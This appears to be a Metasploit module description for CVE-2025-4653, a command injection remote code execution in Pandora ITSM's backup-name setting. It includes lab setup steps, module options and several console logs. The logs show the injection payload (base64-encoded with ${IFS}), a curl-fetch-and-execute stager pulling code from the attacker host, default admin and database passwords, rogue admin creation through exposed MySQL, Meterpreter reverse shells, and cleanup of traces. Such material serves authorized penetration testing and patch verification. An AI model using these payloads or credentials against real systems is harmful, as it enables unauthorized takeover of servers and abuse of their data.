Pandora ITSM auth RCE [CVE-2025-4653]

[h00die-gr3y]

Pandora ITSM is a platform for Service Management & Support including a Helpdesk for support and customer service teams, aligned with ITIL processes.
This module exploits a command injection vulnerability in the name backup setting at the application setup page of Pandora ITSM. This can be triggered by generating a backup with a malicious payload injected at the name parameter.
You need to have admin access at the Pandora ITSM Web application in order to execute this RCE.
This access can be achieved by knowing the admin credentials to access the web application or leveraging a default password vulnerability in Pandora ITSM that allows an attacker to access the Pandora FMS ITSM database, create a new admin user and gain administrative access to the Pandora ITSM Web application. This attack can be remotely executed over the WAN as long as the MySQL services are exposed to the outside world.
This issue affects all ITSM Enterprise editions up to 5.0.105 and is patched at 5.0.106.

The following releases were tested.

Pandora ITSM Releases:

• Pandora ITSM Enterprise Edition 5.0.104 Build 240802 MR97 on Ubuntu 22.04
• Pandora ITSM Enterprise Edition 5.0.105 Build 250129 MR98 on Ubuntu 22.04

Installation steps to install Pandora ITSM Enterprise Edition on Ubuntu 22.04

• Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform.
• Here are the installation instructions for VirtualBox on MacOS.
• Register for a free trial here.
• Install a plain Ubuntu 22.04 VM image.
• Log in at the Ubuntu VM with root.
• Run apt update && apt upgrade to get the latest updates.
• Run the following command curl -SsL https://pfms.me/deploy-pandora-itsm > deploy-pandora-itsm.
• Check the file deploy-pandora-itsm and find the install_script variable that refers to itsm_deploy_enterprise_ubuntu_2204.sh.
• install_script='https://packages.pandorafms.com/projects/deploy/itsm/iBxbqHhtHkOnzp1rINvG/itsm_deploy_enterprise_ubuntu_2204.sh'
• Use the url and download the file with curl and store it locally in the file install.sh.
• curl -LSs https://packages.pandorafms.com/projects/deploy/itsm/iBxbqHhtHkOnzp1rINvG/itsm_deploy_enterprise_ubuntu_2204.sh > install.sh
• Edit install.sh with your favorite editor and change the following line FROM:
• INTEGRIA_PACKAGE_ENT="https://packages.pandorafms.com/c5553382c7268ea9d69dd2f889029162/latest/PandoraITSM_enterprise-latest.tar.gz"
• TO:
• INTEGRIA_PACKAGE_ENT="https://packages.pandorafms.com/c5553382c7268ea9d69dd2f889029162/LTS/PandoraITSM_enterprise-lts.tar.gz"
• Run chmod +x install.sh and execute the script ./install.sh.
• After successful installation of Pandora ITSM you can access the application using the webui via http://your_ip/pandoraitsm.

You are now ready to test the module.

Verification Steps

• Start msfconsole
• use exploit/linux/http/pandora_itsm_auth_rce_cve_2025_4653
• set rhosts <ip-target>
• set rport <port>
• set lhost <attacker-ip>
• set target <0=Unix/Linux Command>
• exploit
  you should get a reverse shell or Meterpreter session depending on the payload and target settings.

Module in action

msf6 exploit(linux/http/pandora_itsm_auth_rce_cve_2025_4653) > options

Module options (exploit/linux/http/pandora_itsm_auth_rce_cve_2025_4653):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   DB_NAME      pandoraitsm      yes       Pandora database
   DB_PASSWORD  P4ndor4.itsm     yes       Pandora database admin password
   DB_PORT      3306             yes       MySQL database port
   DB_USER      pandoraitsm      yes       Pandora database admin user
   PASSWORD     integria         no        Pandora web admin password
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, http, socks5h
   RHOSTS       192.168.201.6    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /pandoraitsm     yes       Path to the Pandora ITSM application
   USERNAME     admin            no        Pandora web admin user
   VHOST                         no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE    true             yes       Attempt to delete the binary after execution
   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.
                                              8 (Accepted: none, bash, python3.8+)
   FETCH_SRVHOST                    no        Local IP to use for serving payload
   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
   FETCH_URIPATH                    no        Local URI to use for serving payload
   LHOST           192.168.201.10   yes       The listen address (an interface may be specified)
   LPORT           4444             yes       The listen port


   When FETCH_COMMAND is one of CURL,WGET:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.


   When FETCH_FILELESS is none:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_FILENAME      xHurjJzz         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces


Exploit target:

   Id  Name
   --  ----
   0   Unix/Linux Command



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/pandora_itsm_auth_rce_cve_2025_4653) > rexploit
[*] Reloading module...
[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Pandora ITSM Enterprise Edition 5.0.104 Build 240802 MR97
[*] Trying to log in with admin credentials admin:integria at the Pandora ITSM Web application.
[*] Succesfully authenticated at the Pandora ITSM Web application.
[*] Saving admin credentials at the msf database.
[*] Executing Unix/Linux Command for cmd/linux/http/x64/meterpreter/reverse_tcp
[*] Sending stage (3090404 bytes) to 192.168.201.6
[*] Meterpreter session 47 opened (192.168.201.10:4444 -> 192.168.201.6:33796) at 2025-07-20 19:15:29 +0000

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : 192.168.201.6
OS           : Ubuntu 22.04 (Linux 5.15.0-144-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > pwd
/var/www/html/pandoraitsm
meterpreter >

[msutovsky-r7]

msf exploit(linux/http/pandora_itsm_auth_rce_cve_2025_4653) > run verbose=true
[*] Command to run on remote host: curl -so ./qULHuihgMs http://192.168.168.128:8888/Q7JGOkCYlO14PhxIQeJRIQ;chmod +x ./qULHuihgMs;./qULHuihgMs&
[*] Fetch handler listening on 192.168.168.128:8888
[*] HTTP server started
[*] Adding resource /Q7JGOkCYlO14PhxIQeJRIQ
[*] Started reverse TCP handler on 192.168.168.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Pandora ITSM Enterprise Edition 5.0.104 Build 240802 MR97
[*] Trying to log in with admin credentials admin:integria at the Pandora ITSM Web application.
[*] Succesfully authenticated at the Pandora ITSM Web application.
[*] Saving admin credentials at the msf database.
[*] Executing Unix/Linux Command for cmd/linux/http/x64/meterpreter/reverse_tcp
[*] RCE payload: ;echo${IFS}Y3VybCAtc28gLi9xVUxIdWloZ01zIGh0dHA6Ly8xOTIuMTY4LjE2OC4xMjg6ODg4OC9RN0pHT2tDWWxPMTRQaHhJUWVKUklRO2NobW9kICt4IC4vcVVMSHVpaGdNczsuL3FVTEh1aWhnTXMm|(base64${IFS}--decode||base64${IFS}-d)|sh;#
[*] Client 192.168.168.195 requested /Q7JGOkCYlO14PhxIQeJRIQ
[*] Sending payload to 192.168.168.195 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 192.168.168.195
[*] Meterpreter session 5 opened (192.168.168.128:4444 -> 192.168.168.195:46798) at 2025-07-24 15:01:59 +0200
[*] No payload entries found at the backup list.

meterpreter > sysinfo 
Computer     : 192.168.168.195
OS           : Ubuntu 22.04 (Linux 6.8.0-64-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

[msutovsky-r7]

msf exploit(linux/http/pandora_itsm_auth_rce_cve_2025_4653) > run verbose=true 
[*] Command to run on remote host: curl -so ./PttCMNWqGl http://192.168.168.196:8080/aLn4NjxVh0sVI6EJ21NX2g;chmod +x ./PttCMNWqGl;./PttCMNWqGl&
[*] Fetch handler listening on 192.168.168.196:8080
[*] HTTP server started
[*] Adding resource /aLn4NjxVh0sVI6EJ21NX2g
[*] Started reverse TCP handler on 192.168.168.196:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Pandora ITSM Enterprise Edition 5.0.104 Build 240802 MR97
[*] Trying to log in with admin credentials admin:integria at the Pandora ITSM Web application.
[*] Successfully authenticated at the Pandora ITSM Web application.
[*] Saving admin credentials to the msf database.
[*] Executing Unix/Linux Command for cmd/linux/http/x64/meterpreter/reverse_tcp
[*] RCE payload: ;echo${IFS}Y3VybCAtc28gLi9QdHRDTU5XcUdsIGh0dHA6Ly8xOTIuMTY4LjE2OC4xOTY6ODA4MC9hTG40Tmp4Vmgwc1ZJNkVKMjFOWDJnO2NobW9kICt4IC4vUHR0Q01OV3FHbDsuL1B0dENNTldxR2wm|(base64${IFS}--decode||base64${IFS}-d)|sh;#
[*] Client 192.168.168.197 requested /aLn4NjxVh0sVI6EJ21NX2g
[*] Sending payload to 192.168.168.197 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 192.168.168.197
[*] Meterpreter session 1 opened (192.168.168.196:4444 -> 192.168.168.197:52918) at 2025-08-07 08:31:58 +0200

[*] ["index.php?sec=godmode&sec2=enterprise/godmode/setup/integria_backup&offset=0&remove=1&id_bk=16"]
[+] Payload entries successfully removed from backup list.

meterpreter > 
meterpreter > sysinfo
Computer     : 192.168.168.197
OS           : Ubuntu 22.04 (Linux 6.8.0-64-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

[msutovsky-r7]

msf exploit(linux/http/pandora_itsm_auth_rce_cve_2025_4653) > run verbose=true 
[*] Command to run on remote host: curl -so ./qfZvKulG http://192.168.168.196:8080/aLn4NjxVh0sVI6EJ21NX2g;chmod +x ./qfZvKulG;./qfZvKulG&
[*] Fetch handler listening on 192.168.168.196:8080
[*] HTTP server started
[*] Adding resource /aLn4NjxVh0sVI6EJ21NX2g
[*] Started reverse TCP handler on 192.168.168.196:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Pandora ITSM Enterprise Edition 5.0.104 Build 240802 MR97
[*] Trying to log in with admin credentials ffff:integria at the Pandora ITSM Web application.
[*] Logging in with admin credentials failed. Trying to connect to the Pandora MySQL server.
[*] Creating new admin user with credentials nsnik:9AHDHeD1D4 for access at the Pandora ITSM Web application.
[*] Trying to log in with new admin credentials nsnik:9AHDHeD1D4 at the Pandora ITSM Web application.
[*] Successfully authenticated at the Pandora ITSM Web application.
[*] Saving admin credentials to the msf database.
[*] Executing Unix/Linux Command for cmd/linux/http/x64/meterpreter/reverse_tcp
[*] RCE payload: ;echo${IFS}Y3VybCAtc28gLi9xZlp2S3VsRyBodHRwOi8vMTkyLjE2OC4xNjguMTk2OjgwODAvYUxuNE5qeFZoMHNWSTZFSjIxTlgyZztjaG1vZCAreCAuL3FmWnZLdWxHOy4vcWZadkt1bEcm|(base64${IFS}--decode||base64${IFS}-d)|sh;#
[*] Client 192.168.168.197 requested /aLn4NjxVh0sVI6EJ21NX2g
[*] Sending payload to 192.168.168.197 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 192.168.168.197
[*] Meterpreter session 2 opened (192.168.168.196:4444 -> 192.168.168.197:51966) at 2025-08-07 08:34:28 +0200
[*] ["index.php?sec=godmode&sec2=enterprise/godmode/setup/integria_backup&offset=0&remove=1&id_bk=17"]
[+] Payload entries successfully removed from backup list.

meterpreter > sysinfo
Computer     : 192.168.168.197
OS           : Ubuntu 22.04 (Linux 6.8.0-64-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

[msutovsky-r7]

Release Notes

This adds a new module for CVE-2025-4653 - authenticated remote code execution in Pandora ITSM. This module exploits a command injection vulnerability in the name backup setting on the application setup page of Pandora ITSM. This can be triggered by generating a backup with a malicious payload injected at the name parameter. The module requires valid application credentials. Alternatively, if a database is exposed, the module can create a new admin account by connecting to the database.